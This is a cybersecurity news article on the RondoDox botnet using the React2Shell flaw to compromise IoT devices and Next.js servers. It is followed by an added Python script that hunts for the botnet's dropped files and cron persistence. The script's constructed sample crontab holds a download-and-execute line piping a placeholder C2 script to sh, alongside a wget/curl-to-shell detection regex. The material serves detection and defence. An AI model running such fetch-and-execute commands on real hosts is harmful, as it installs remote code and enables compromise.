RondoDox Botnet Exploits Critical React2Shell Flaw To Access IoT Devices & Web Servers
“IoT devices and web servers have been accessed without authorization by the RondoDox botnet through exploitation of the critical React2Shell flaw.”
Cybersecurity researchers have revealed details of a relentless nine-month campaign that targeted Internet of Things (IoT) devices and web applications to enlist them in a botnet known as RondoDox.
CloudSEK, Analysis
As of December 2025, the activity has been seen using the newly revealed React2Shell (CVE-2025-55182, CVSS score: 10.0) vulnerability as a first point of access.
“It effectively prevents reinfection by competing actors by killing non-whitelisted processes every ~45 seconds and continuously scanning /proc to enumerate running executables.”
React2Shell is a serious security flaw in Next.js and React Server Components (RSC) that could enable unauthenticated attackers to execute code remotely on vulnerable systems.

Shadowserver Foundation, Statistics
As of December 31, 2025, there are around 90,300 instances that are still vulnerable; 68,400 of them are in the United States, followed by Germany (4,300), France (2,800), and India (1,500).
Since its debut in early 2025, RondoDox has expanded its scope by adding exploits for further N-day security flaws, such as CVE-2023-1389 and CVE-2025-24893. It is worth noting that Darktrace, Kaspersky, and VulnCheck had already drawn attention to the abuse of React2Shell to propagate the botnet.
The RondoDox campaign is believed to have progressed through three distinct stages before CVE-2025-55182 was exploited.
- March – April 2025: Manual vulnerability scanning and preliminary reconnaissance.
- April – June 2025: Daily mass vulnerability probing of web apps, including WordPress, Drupal, and Struts2, as well as IoT devices such as Wavlink routers.
- July – early December 2025: Large-scale automatic deployment every hour.
In the attacks discovered in December 2025, the threat actors scanned for vulnerable Next.js servers and then dropped a botnet loader and health checker (“/nuts/bolts”), cryptocurrency miners (“/nuts/poop”), and a Mirai botnet variant (“/nuts/x86”) on compromised devices.
Before downloading the main bot binary from its command-and-control (C2) server, “/nuts/bolts” kills rival malware and cryptocurrency miners. One version of the tool has been found to set up persistence via “/etc/crontab” and to remove known botnets, Docker-based payloads, artifacts from previous campaigns, and related cron jobs.
To reduce the risk posed by this threat, organizations are encouraged to deploy Web Application Firewalls (WAFs), segment all IoT devices into dedicated VLANs, update Next.js to a patched version as soon as feasible, monitor for unusual process execution, and block known C2 infrastructure.
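As an added example of the process and persistence monitoring the mitigations above call for (this is not code from the article, CloudSEK, or any of the vendors named), the following Python script checks a process listing and crontab text for the dropped-file paths the article names and for a generic download-and-execute cron pattern. The sample process list and crontab are constructed for the demonstration; the fetch-and-execute regex is a triage heuristic assumed here, not an indicator taken from the article.

```python
"""Hunt for RondoDox-style artifacts in a process listing and crontab entries.

Added example, not part of the original article or any vendor report.
The indicator paths come from the article (/nuts/bolts, /nuts/poop, /nuts/x86);
the sample process list and crontab below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Iterable

# Dropped-file paths named in the article. Substring matching is used so that
# copies staged under /tmp, /var/tmp or /dev/shm are still caught.
INDICATOR_PATHS = ("/nuts/bolts", "/nuts/poop", "/nuts/x86")

# Generic download-and-execute pattern often seen in cron-based persistence.
# Assumption of this example: a triage heuristic, not proof of compromise.
FETCH_EXEC_RE = re.compile(r"\b(wget|curl)\b.*\|\s*(sh|bash)\b")


@dataclass(frozen=True)
class Finding:
    source: str      # "proc" or "crontab"
    location: str    # pid or crontab line number
    reason: str
    evidence: str


def scan_process_list(procs: Iterable[tuple[int, str]]) -> list[Finding]:
    """procs: (pid, cmdline) pairs, e.g. read from /proc/<pid>/cmdline on a live host."""
    findings = []
    for pid, cmdline in procs:
        for ioc in INDICATOR_PATHS:
            if ioc in cmdline:
                findings.append(Finding("proc", str(pid), f"indicator path {ioc}", cmdline))
                break
    return findings


def scan_crontab(text: str) -> list[Finding]:
    """Scan crontab text (e.g. the contents of /etc/crontab) line by line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        matched_ioc = next((ioc for ioc in INDICATOR_PATHS if ioc in stripped), None)
        if matched_ioc:
            findings.append(Finding("crontab", str(lineno), f"indicator path {matched_ioc}", stripped))
        elif FETCH_EXEC_RE.search(stripped):
            findings.append(Finding("crontab", str(lineno), "download-and-execute pattern", stripped))
    return findings


def read_live_processes() -> list[tuple[int, str]]:
    """Collect (pid, cmdline) pairs from /proc on a Linux host; unreadable entries are skipped."""
    result = []
    for entry in Path("/proc").iterdir():
        if not entry.name.isdigit():
            continue
        try:
            raw = (entry / "cmdline").read_bytes()
        except OSError:
            continue
        result.append((int(entry.name), raw.replace(b"\0", b" ").decode(errors="replace").strip()))
    return result


# --- constructed sample data (not real telemetry) ---
SAMPLE_PROCS = [
    (1, "/sbin/init"),
    (812, "/usr/bin/node server.js"),
    (2931, "/tmp/nuts/bolts"),
    (2950, "/dev/shm/nuts/x86"),
]

SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root /tmp/nuts/bolts >/dev/null 2>&1
@reboot root wget -q -O - http://c2.invalid/setup.sh | sh
"""


def demo() -> list[Finding]:
    """Run both scanners over the constructed sample data."""
    return scan_process_list(SAMPLE_PROCS) + scan_crontab(SAMPLE_CRONTAB)


if __name__ == "__main__":
    # For a live host, replace SAMPLE_PROCS with read_live_processes() and
    # SAMPLE_CRONTAB with Path("/etc/crontab").read_text().
    for f in demo():
        print(f"[{f.source}:{f.location}] {f.reason}: {f.evidence}")
```

On the constructed data the script reports two process hits (the staged loader and Mirai binary) and two crontab hits (the loader's cron entry and the download-and-execute line), while the legitimate run-parts entry is left alone. The `c2.invalid` host is a placeholder, not a real C2 address.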
About The Author
Suraj Koli is a content specialist in technical writing about cybersecurity and information security. He has written many articles on cybersecurity concepts, covering the latest trends in cyber awareness and ethical hacking.